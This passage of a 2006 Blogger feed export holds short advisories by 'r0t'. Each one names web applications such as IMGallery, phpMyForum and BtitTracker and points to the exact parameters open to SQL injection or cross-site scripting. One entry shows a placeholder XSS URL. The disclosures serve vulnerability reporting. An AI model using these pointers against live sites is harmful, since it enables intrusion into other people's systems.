class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115085563686544154?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115085563686544154/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115085563686544154' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115085563686544154'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115085563686544154'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/fineshop-vuln.html' title='FineShop vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115085558122105292</id><published>2006-06-21T04:05:00.000+02:00</published><updated>2006-06-21T04:06:21.730+02:00</updated><title type='text'>IMGallery vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 21 june 2006&lt;br /&gt;vendor:http://www.imgallery.zor.pl/&lt;br /&gt;affected versions:2.4 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;IMGallery contains a flaw that allows a remote sql injection attacks.Input passed to the "start","sort" parameter in "galeria.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115085558122105292?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115085558122105292/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115085558122105292' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115085558122105292'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115085558122105292'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/imgallery-vuln.html' title='IMGallery vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115080945422082434</id><published>2006-06-20T15:17:00.000+02:00</published><updated>2006-09-14T07:03:46.200+02:00</updated><title type='text'>Atlassian JIRA™ Information Disclosure</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 20 june 2006&lt;br /&gt;vendor:http://www.atlassian.com/software/jira/&lt;br /&gt;affected versions: &lt;br /&gt;Enterprise Edition, Version: 3.6.2-#156&lt;br /&gt;other versions also can be affected&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Input passed via the URL when accessing "secure/ConfigureReleaseNote.jspa" directly isn't properly sanitised before being returned to the user in an error response. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;Atlassian JIRA™ contains a flaw that allows malicious people to gain knowledge of various system information.Input passed to the "projectId" parameter in "secure/ConfigureReleaseNote.jspa" isn't properly sanitised before being returned to the user.&lt;br /&gt;With error message/report remote attacker will get various system information in example to get full install path, used software,general system configuration. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Restrict access to the "secure/ConfigureReleaseNote.jspa" script in a proxy server or firewall with URL filtering capabilities. This may affect functionality.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115080945422082434?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115080945422082434/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115080945422082434' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115080945422082434'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115080945422082434'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/atlassian-jira-information-disclosure.html' title='Atlassian JIRA™ Information Disclosure'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115080036514710524</id><published>2006-06-20T12:45:00.000+02:00</published><updated>2007-03-31T00:49:30.416+02:00</updated><title type='text'>phpMyForum &lt;=4.1.3 XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 20 june 2006&lt;br /&gt;vendor:http://www.phpmyforum.de/&lt;br /&gt;affected versions:4.1.3 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;phpMyForum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "highlight" parameter in "topic.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115080036514710524?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115080036514710524/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115080036514710524' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115080036514710524'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115080036514710524'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/phpmyforum-413-xss-vuln.html' title='phpMyForum &lt;=4.1.3 XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115076946292766265</id><published>2006-06-20T04:10:00.000+02:00</published><updated>2006-06-20T04:11:03.336+02:00</updated><title type='text'>CavoxCms SQL injection vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 20 june 2006&lt;br /&gt;vendor:http://www.cavoxcms.ch/&lt;br /&gt;affected versions:v1.0.16 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CavoxCms contains a flaw that allows a remote sql injection attacks.Input passed to the "page" parameter in "index.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115076946292766265?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115076946292766265/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115076946292766265' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115076946292766265'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115076946292766265'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/cavoxcms-sql-injection-vuln.html' title='CavoxCms SQL injection vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115074231894785379</id><published>2006-06-19T20:37:00.000+02:00</published><updated>2007-02-27T01:59:03.913+01:00</updated><title type='text'>NC LinkList XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 19 june 2006&lt;br /&gt;vendor:http://www.php-linkverzeichnis.de/&lt;br /&gt;affected versions:1.2 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;NC LinkList contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "cat" and "view" parameter in "index.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115074231894785379?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115074231894785379/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115074231894785379' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115074231894785379'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115074231894785379'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/nc-linklist-xss-vuln.html' title='NC LinkList XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115074119333877356</id><published>2006-06-19T20:19:00.000+02:00</published><updated>2006-06-19T20:19:54.066+02:00</updated><title type='text'>Clubpage vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 19 june 2006&lt;br /&gt;vendor:http://www.powerbatt.com/c-page/&lt;br /&gt;affected versions:Clubpage &lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;1.&lt;br /&gt;Clubpage contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "news_archive","language","intranetLogin" parameter in "index.php" and input passed to the "sites_id" parameter in "sites.php"  and input passed to the "news_id" parameter in "news_more.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;2.&lt;br /&gt;Clubpage contains a flaw that allows a remote sql injection attacks.Input passed to the "category" parameter in "index.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;note: XSS and sql injection vuln. also you will find in modules like calendar,runers-script and others.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115074119333877356?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115074119333877356/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115074119333877356' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115074119333877356'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115074119333877356'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/clubpage-vuln.html' title='Clubpage vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115073953499870648</id><published>2006-06-19T19:51:00.000+02:00</published><updated>2006-06-19T19:52:15.153+02:00</updated><title type='text'>SLAB500 vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 19 june 2006&lt;br /&gt;vendor:http://www.slab500.com/&lt;br /&gt;affected versions:SLAB500 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;SLAB500 contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "page" and "addcomment" parameter in "index.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;note: &lt;br /&gt;Input in "page" parameter in "index.php" will give full path disclosure, and maybe a minimal possibilty to inluce files from local resource. &lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115073953499870648?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115073953499870648/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115073953499870648' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115073953499870648'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115073953499870648'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/slab500-vuln.html' title='SLAB500 vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115073562576534076</id><published>2006-06-19T18:46:00.000+02:00</published><updated>2006-06-19T18:47:06.343+02:00</updated><title type='text'>PHCDownload SQL injection vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 19 june 2006&lt;br /&gt;vendor:http://www.phpcredo.com/&lt;br /&gt;affected versions:&lt;br /&gt;v1.0.0 Final&lt;br /&gt;v1.0.0 Release Candidate 6&lt;br /&gt;and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PHCDownload contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "category.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115073562576534076?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115073562576534076/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115073562576534076' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115073562576534076'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115073562576534076'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/phcdownload-sql-injection-vuln.html' title='PHCDownload SQL injection vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115073283831772545</id><published>2006-06-19T18:00:00.000+02:00</published><updated>2006-12-24T18:14:08.276+01:00</updated><title type='text'>AssoCIateD XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 19 june 2006&lt;br /&gt;vendor:http://herve.labas.free.fr/acid/en/&lt;br /&gt;affected versions:v1.2.0 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;AssoCIateD contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "menu" parameter in "index.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;example:&lt;br /&gt;/index.php?p=gal&amp;menu=1[XSS]&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115073283831772545?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115073283831772545/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115073283831772545' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115073283831772545'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115073283831772545'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/associated-xss-vuln.html' title='AssoCIateD XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115073050306164332</id><published>2006-06-19T17:21:00.000+02:00</published><updated>2006-06-19T17:21:43.506+02:00</updated><title type='text'>Arctic XSS</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 19 june 2006&lt;br /&gt;vendor:www.olate.co.uk/products/arctic/&lt;br /&gt;affected versions:1.0.2 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Input passed to the search results page and the "/index.php?cmd=search" Query field form isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of a vulnerable site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115073050306164332?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115073050306164332/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115073050306164332' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115073050306164332'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115073050306164332'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/arctic-xss.html' title='Arctic XSS'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115072874688348861</id><published>2006-06-19T16:51:00.000+02:00</published><updated>2006-11-02T03:05:56.960+01:00</updated><title type='text'>Open-Realty SQL injection vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 19 june 2006&lt;br /&gt;vendor:http://www.open-realty.org/&lt;br /&gt;affected versions:2.3.1&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Open-Realty contains a flaw that allows a remote sql injection attacks.Input passed to the "sorttype" parameter in "index.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115072874688348861?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115072874688348861/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115072874688348861' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115072874688348861'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115072874688348861'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/open-realty-sql-injection-vuln.html' title='Open-Realty SQL injection vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115072795204241005</id><published>2006-06-19T16:38:00.000+02:00</published><updated>2007-02-17T12:08:26.846+01:00</updated><title type='text'>Free Realty vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 19 june 2006&lt;br /&gt;vendor:http://freerealty.rwcinc.net/&lt;br /&gt;affected versions:2.9-0.7,2.9-0.6 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Free Realty contains a flaw that allows a remote sql injection attacks.Input passed to the "sort" parameter in "propview.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Note about prior versions: &lt;br /&gt;I tested that bug also on Demo site wich are 2.9-0.6, so in same variable was possible XSS ...&lt;br /&gt;And in some earlier 2.9 versions , with an error attacker will get installisations full path and other info. &lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115072795204241005?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115072795204241005/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115072795204241005' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115072795204241005'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115072795204241005'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/free-realty-vuln.html' title='Free Realty vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115072443003082352</id><published>2006-06-19T15:39:00.000+02:00</published><updated>2006-10-11T15:31:09.966+02:00</updated><title type='text'>BtitTracker SQL injection vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 19 june 2006&lt;br /&gt;vendor:http://www.btiteam.org/&lt;br /&gt;affected versions:v.1.3.2 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;BtitTracker contains a flaw that allows a remote sql injection attacks.Input passed to the "by" and "order"  parameter in "torrents.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115072443003082352?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115072443003082352/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115072443003082352' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115072443003082352'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115072443003082352'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/btittracker-sql-injection-vuln.html' title='BtitTracker SQL injection vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115072260958850142</id><published>2006-06-19T15:09:00.000+02:00</published><updated>2007-02-18T07:03:36.050+01:00</updated><title type='text'>phpMyDirectory XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 19 june 2006&lt;br /&gt;vendor:http://www.phpmydirectory.com/&lt;br /&gt;affected versions:v.10.4.5 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;phpMyDirectory contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "PIC" parameter in "offers-pix.php" and input passed to the "from" parameter in "cp/index.php" and input passed to the "action" parameter in "cp/admin_index.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br 